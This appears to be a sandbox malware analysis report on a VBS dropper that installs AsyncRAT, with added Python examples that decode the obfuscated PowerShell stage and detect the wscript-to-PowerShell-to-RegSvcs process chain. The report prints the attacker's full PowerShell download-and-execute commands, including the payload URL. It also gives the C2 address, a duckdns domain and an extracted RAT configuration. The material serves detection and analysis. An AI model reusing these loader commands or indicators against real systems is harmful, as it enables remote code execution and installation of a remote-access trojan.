OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 5332, ProcessName: wscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv 
G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadSt
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 
d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadSt
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb 
HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadSt
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 5332, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho 
LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:
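The PowerShell command line recorded above decodes its second stage in three steps: every space in the quoted blob is turned back into the letter A, the result is base64-decoded, and the bytes are read as UTF-16LE ([Text.Encoding]::Unicode); the placeholder %pzAcOgInMr% is then replaced with the script's own path before the decoded text is handed to a nested powershell. The Python below is added here as an editor's example and is not part of the Joe Sandbox report; it reverses that transformation and adds a heuristic for recognising the trick in arbitrary command lines. It runs on a constructed sample stage, not on the blob from the report, so the recovered text is the constructed one and says nothing about what the real second stage contained.

```python
"""Reverse the space-for-'A' base64/UTF-16LE obfuscation used by the PowerShell stage in the report."""
import base64
import re
from typing import Optional

# Constructed sample stage (NOT the attacker's decoded script): harmless text that
# uses the same %pzAcOgInMr% placeholder the report's command line substitutes.
SAMPLE_STAGE = "Write-Output ('stage two would run from ' + '%pzAcOgInMr%');"
SAMPLE_PATH = r"C:\Users\user\Desktop\sostener.vbs"


def obfuscate(script: str) -> str:
    """Encode the way the dropper expects: UTF-16LE -> base64 -> every 'A' becomes a space.
    Used only to build the constructed sample; the real blob was produced by the attacker."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return b64.replace("A", " ")


def deobfuscate(blob: str) -> str:
    """Mirror the command line: .replace(' ','A'), FromBase64String, Encoding.Unicode.GetString."""
    restored = blob.replace(" ", "A")
    raw = base64.b64decode(restored, validate=True)
    return raw.decode("utf-16-le")


def looks_like_space_padded_utf16_b64(blob: str) -> bool:
    """Heuristic for any quoted string in a PowerShell command line: once spaces are
    restored to 'A' it must be well-formed base64 whose bytes are UTF-16LE ASCII
    (every odd byte is 0x00). Base64 of plain ASCII fails the odd-byte check."""
    restored = blob.replace(" ", "A")
    if len(restored) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", restored):
        return False
    try:
        raw = base64.b64decode(restored, validate=True)
    except ValueError:
        return False
    return len(raw) >= 8 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])


def decode_dropper_cmdline(cmdline: str) -> Optional[str]:
    """Recover the second stage from a command line shaped like the report's:
    $var = '<blob>'; ... .replace('%placeholder%', '<path>') ... powershell $var2;
    Returns None when no space-padded UTF-16LE blob is present."""
    m = re.search(r"\$\w+\s*=\s*'([A-Za-z0-9+/= ]+)'", cmdline)
    if not m or not looks_like_space_padded_utf16_b64(m.group(1)):
        return None
    stage = deobfuscate(m.group(1))
    # Apply the same placeholder substitutions the dropper performs; skip the ' '->'A' repair.
    for placeholder, value in re.findall(r"\.replace\('([^']+)',\s*'([^']+)'\)", cmdline):
        if placeholder != " ":
            stage = stage.replace(placeholder, value)
    return stage


def build_sample_cmdline(stage: str, path: str) -> str:
    """Construct a command line with the same shape as the one in the report (test input only)."""
    return (
        '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
        f"$ExeNy = '{obfuscate(stage)}';"
        "$KByHL = [system.Text.Encoding]::Unicode.GetString( "
        "[system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );"
        f"$KByHL = $KByHL.replace('%pzAcOgInMr%', '{path}');powershell $KByHL;"
    )


if __name__ == "__main__":
    print(decode_dropper_cmdline(build_sample_cmdline(SAMPLE_STAGE, SAMPLE_PATH)))
```

The odd-byte check is what distinguishes this blob from ordinary base64 of ASCII: UTF-16LE text of ASCII characters has a zero high byte for every character, and because of that the base64 alphabet's 'A' (six zero bits) recurs so often that swapping it for a space breaks the blob into short tokens, which is why a regex that demands one long unbroken base64 run does not match this command line.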
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-10-01T06:29:58.380252+0200 | 2020424 | 1 | Exploit Kit Activity Detected | 91.202.233.169 | 80 | 192.168.2.4 | 49730 | TCP
            2024-10-01T06:30:19.591904+0200 | 2034847 | 1 | Domain Observed Used for C2 Detected | 89.117.23.22 | 4455 | 192.168.2.4 | 49737 | TCP
            2024-10-01T06:30:19.591904+0200 | 2842478 | 1 | Malware Command and Control Activity Detected | 89.117.23.22 | 4455 | 192.168.2.4 | 49737 | TCP
            2024-10-01T06:29:58.030429+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 91.202.233.169 | 80 | TCP
            2024-10-01T06:29:58.378098+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 91.202.233.169 | 80 | TCP
            2024-10-01T06:30:19.591904+0200 | 2848048 | 1 | Domain Observed Used for C2 Detected | 89.117.23.22 | 4455 | 192.168.2.4 | 49737 | TCP


            AV Detection

            Source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": ")8\"zc", "Ports": "$A<IlE,84,7;&gV", "Version": "*wacp!]6l[e", "BDOS": "U^2", "AES_key": "R4OsSR16j3MjPEBlkfzyOGTLnlxVVuwW", "Mutex": "n#QO", "Certificate": "UDq5O^", "ServerSignature": "1", "Group": "Oy\\iql0S13XbS4sp1@PsWg:PGIw'~?Q;ifHa#3ef8L\"SpWzk,&&}s;$/?J9UH3>j3={V'nCn.PI*|e>4&k2[2Y\"w$T+^X_j9HSG[?b*'54eS5e_~(e#Z\"n,TX*T->_qfnrv]TM^:Sm1uBPI9|\\4a^^?R|av{V =9J2E|^{wS7Zq,=)a;uL uRaE\"K5bW ycl@NpcoGBww~DzGBkD+U1vws!$\"Awn}G}9cJ6;M^g4xsh'`s^(KX%.#m`^wc.Syd?~c\"Lsj>]?`qx7a!]~a7*CV\\/w6F+j0{&]M*&[7-]2Y</uTKz[gT&GM", "AntiProcess": "HB!<i[>IoEHueVuN1#fc!@?Z#TsdM.i5RX/xjjmOH +NC,v <85~NN!Z.)uebFY`", "PasteBin": "FLVl;"}
            Source: dczas.duckdns.org, Virustotal: Detection: 9%
            Source: http://91.202.233.169, Virustotal: Detection: 9%
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
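The single entry above records the pivot of this chain: the script host wscript.exe spawned powershell.exe. The Python below is an added editor's example, not part of the report, showing how the parent/child pairs and command-line indicators behind the Sigma hits listed for this sample (WScript or CScript Dropper, PowerShell Base64 Encoded FromBase64String Cmdlet, Base64 Encoded PowerShell Command Detected) can be checked against process-creation events. The events are constructed: the PIDs 2580, 5332, 3848, 4312 and 6884 and the wscript.exe → powershell.exe link come from the report, but the parent/child links between the two PowerShell processes and RegSvcs.exe and the second PowerShell command line are assumptions made for illustration, and the long blob is shortened.

```python
"""Flag the script-host -> PowerShell -> .NET-utility chain over process-creation events."""
import re
from dataclasses import dataclass
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# .NET Framework utilities commonly used as hosts for injected payloads;
# RegSvcs.exe is the one the report's Yara hits point at.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe"}

# Command-line indicators mirroring the Sigma hits listed in the report.
INDICATORS = {
    "frombase64string": re.compile(r"FromBase64String", re.IGNORECASE),
    # the space-for-'A' trick: the blob is repaired with .replace(' ','A') before decoding
    "space_for_A_base64": re.compile(r"\.replace\(\s*' '\s*,\s*'A'\s*\)", re.IGNORECASE),
    # decoded text handed to a nested interpreter: ...; powershell $var;
    "nested_powershell_var": re.compile(r"\bpowershell\s+\$\w+\s*;?\s*$", re.IGNORECASE),
    "webclient_download": re.compile(r"Net\.WebClient|DownloadString\(|DownloadData\(", re.IGNORECASE),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE),
}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def detect(events: List[ProcEvent]) -> List[str]:
    """Return one finding per suspicious parent/child pair or indicator-bearing command line."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[str] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pname = parent.name if parent else ""
        if pname in SCRIPT_HOSTS and e.name in POWERSHELL:
            findings.append(f"pid {e.pid}: {pname} spawned {e.name} (script-host dropper)")
        if pname in POWERSHELL and e.name in DOTNET_HOSTS:
            findings.append(f"pid {e.pid}: {pname} spawned {e.name} (likely injection host)")
        if e.name in POWERSHELL:
            hits = [k for k, rx in INDICATORS.items() if rx.search(e.cmdline)]
            if hits:
                findings.append(f"pid {e.pid}: {e.name} command line indicators: {', '.join(hits)}")
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events; see the lead-in for which parts are taken from the report and which are assumed.
SAMPLE_EVENTS = [
    ProcEvent(2580, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(5332, 2580, r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"'),
    # first PowerShell: the report's command line with the blob shortened
    ProcEvent(3848, 5332, PS,
              f'"{PS}" '
              "$ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow==';"
              "$KByHL = [system.Text.Encoding]::Unicode.GetString( "
              "[system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );"
              r"$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');"
              "powershell $KByHL;"),
    # second PowerShell (assumed command line, not the report's decoded stage): fetches the next stage
    ProcEvent(4312, 3848, PS,
              f'"{PS}" [Byte[]] $b = [Convert]::FromBase64String('
              "(New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'))"),
    # RegSvcs.exe launched with no arguments, hosting the injected payload (parent assumed)
    ProcEvent(6884, 4312, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"),
]


def run_sample() -> List[str]:
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for line in run_sample():
        print(line)
```

A .NET utility such as RegSvcs.exe started by PowerShell with an empty argument list is worth a finding on its own, independent of the command-line indicators: the binary does nothing useful without arguments, so the only reason to start it is to have a signed, trusted process to write into.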

            Networking

            Source: Network traffic, Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 89.117.23.22:4455 -> 192.168.2.4:49737
            Source: Network traffic, Suricata IDS: 2034847 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT) : 89.117.23.22:4455 -> 192.168.2.4:49737
            Source: Network traffic, Suricata IDS: 2848048 - Severity 1 - ETPRO MALWARE Observed Malicious SSL Cert (AsyncRAT) : 89.117.23.22:4455 -> 192.168.2.4:49737
            Source: Network traffic, Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 91.202.233.169:80 -> 192.168.2.4:49730
            Source: Malware configuration extractor, URLs: )8"zc
            Source: unknown, DNS query: name: dczas.duckdns.org
            Source: Yara match, File source: 3.2.powershell.exe.1851cfd0000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.powershell.exe.18506078440.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.powershell.exe.18504da3b80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: global traffic, TCP traffic: 192.168.2.4:49737 -> 89.117.23.22:4455
